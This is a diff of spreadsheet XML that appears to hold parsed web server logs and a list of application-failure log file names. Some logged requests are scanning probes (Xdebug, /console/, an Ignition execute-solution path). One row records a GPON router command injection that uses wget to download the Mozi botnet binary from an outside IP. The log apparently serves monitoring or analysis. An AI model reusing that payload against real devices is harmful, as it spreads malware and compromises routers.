+      <c r="E100" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="101">
+      <c r="A101" t="inlineStr">
+        <is>
+          <t>2021-02-25 00:45:09.544</t>
+        </is>
+      </c>
+      <c r="B101" t="inlineStr">
+        <is>
+          <t xml:space="preserve">10.0.20.244 
+</t>
+        </is>
+      </c>
+      <c r="C101" t="inlineStr">
+        <is>
+          <t>GET /</t>
+        </is>
+      </c>
+      <c r="D101" t="inlineStr">
+        <is>
+          <t>XDEBUG_SESSION_START=phpstorm</t>
+        </is>
+      </c>
+      <c r="E101" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="102">
+      <c r="A102" t="inlineStr">
+        <is>
+          <t>2021-02-25 00:45:22.908</t>
+        </is>
+      </c>
+      <c r="B102" t="inlineStr">
+        <is>
+          <t xml:space="preserve">10.0.20.244 
+</t>
+        </is>
+      </c>
+      <c r="C102" t="inlineStr">
+        <is>
+          <t>GET /console/</t>
+        </is>
+      </c>
+      <c r="D102" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E102" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="103">
+      <c r="A103" t="inlineStr">
+        <is>
+          <t>2021-02-25 00:45:26.216</t>
+        </is>
+      </c>
+      <c r="B103" t="inlineStr">
+        <is>
+          <t xml:space="preserve">10.0.20.244 
+</t>
+        </is>
+      </c>
+      <c r="C103" t="inlineStr">
+        <is>
+          <t>GET /_ignition/execute-solution</t>
+        </is>
+      </c>
+      <c r="D103" t="inlineStr">
+        <is>
+          <t>null</t>
+        </is>
+      </c>
+      <c r="E103" t="inlineStr">
+        <is>
+          <t xml:space="preserve"> </t>
+        </is>
+      </c>
+    </row>
+    <row r="104">
+      <c r="A104" t="inlineStr">
+        <is>
+          <t>2021-02-25 00:46:20.021</t>
+        </is>
+      </c>
+      <c r="B104" t="inlineStr">
+        <is>
+          <t xml:space="preserve">176.113.161.65 
+</t>
+        </is>
+      </c>
+      <c r="C104" t="inlineStr">
+        <is>
+          <t>POST /GponForm/diag_Form</t>
+        </is>
+      </c>
+      <c r="D104" t="inlineStr">
+        <is>
+          <t>images/</t>
+        </is>
+      </c>
+      <c r="E104" t="inlineStr">
         <is>
           <t xml:space="preserve"> XWebPageName=diag&amp;diag_action=ping&amp;wan_conlist=0&amp;dest_host=``;wget+http://176.113.161.65:40089/Mozi.m+-O+-&gt;/tmp/gpon80</t>
         </is>
@@ -946,7 +3349,7 @@
     <outlinePr summaryBelow="1" summaryRight="1"/>
     <pageSetUpPr/>
   </sheetPr>
-  <dimension ref="A1:A4"/>
+  <dimension ref="A1:A19"/>
   <sheetViews>
     <sheetView workbookViewId="0">
       <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
@@ -968,19 +3371,124 @@
     <row r="2">
       <c r="A2" t="inlineStr">
         <is>
-          <t>testLog1.log</t>
+          <t>2021-03-02_00.App-Fail.log</t>
         </is>
       </c>
     </row>
     <row r="3">
       <c r="A3" t="inlineStr">
         <is>
-          <t>testLog2.log</t>
+          <t>2021-03-02_01.App-Fail.log</t>
         </is>
       </c>
     </row>
     <row r="4">
       <c r="A4" t="inlineStr">
+        <is>
+          <t>2021-03-02_02.App-Fail.log</t>
+        </is>
+      </c>
+    </row>
+    <row r="5">
+      <c r="A5" t="inlineStr">
+        <is>
+          <t>2021-03-02_03.App-Fail.log</t>
+        </is>
+      </c>
+    </row>
+    <row r="6">
+      <c r="A6" t="inlineStr">
+        <is>
+          <t>2021-03-02_04.App-Fail.log</t>
+        </is>
+      </c>
+    </row>
+    <row r="7">
+      <c r="A7" t="inlineStr">
+        <is>
+          <t>2021-03-02_05.App-Fail.log</t>
+        </is>
+      </c>
+    </row>
+    <row r="8">
+      <c r="A8" t="inlineStr">
+        <is>
+          <t>2021-03-02_06.App-Fail.log</t>
+        </is>
+      </c>
+    </row>
+    <row r="9">
+      <c r="A9" t="inlineStr">
+        <is>
+          <t>2021-03-02_07.App-Fail.log</t>
+        </is>
+      </c>
+    </row>
+    <row r="10">
+      <c r="A10" t="inlineStr">
+        <is>
+          <t>2021-03-02_08.App-Fail.log</t>
+        </is>
+      </c>
+    </row>
+    <row r="11">
+      <c r="A11" t="inlineStr">
+        <is>
+          <t>2021-03-02_09.App-Fail.log</t>
+        </is>
+      </c>
+    </row>
+    <row r="12">
+      <c r="A12" t="inlineStr">
+        <is>
+          <t>2021-03-02_10.App-Fail.log</t>
+        </is>
+      </c>
+    </row>
+    <row r="13">
+      <c r="A13" t="inlineStr">
+        <is>
+          <t>2021-03-02_11.App-Fail.log</t>
+        </is>
+      </c>
+    </row>
+    <row r="14">
+      <c r="A14" t="inlineStr">
+        <is>
+          <t>2021-03-02_12.App-Fail.log</t>
+        </is>
+      </c>
+    </row>
+    <row r="15">
+      <c r="A15" t="inlineStr">
+        <is>
+          <t>2021-03-02_13.App-Fail.log</t>
+        </is>
+      </c>
+    </row>
+    <row r="16">
+      <c r="A16" t="inlineStr">
+        <is>
+          <t>2021-03-02_14.App-Fail.log</t>
+        </is>
+      </c>
+    </row>
+    <row r="17">
+      <c r="A17" t="inlineStr">
+        <is>
+          <t>testLog1.log</t>
+        </is>
+      </c>
+    </row>
+    <row r="18">
+      <c r="A18" t="inlineStr">
+        <is>
+          <t>testLog2.log</t>
+        </is>
+      </c>
+    </row>
+    <row r="19">
+      <c r="A19" t="inlineStr">
         <is>
           <t>testLog3.log</t>
         </is>
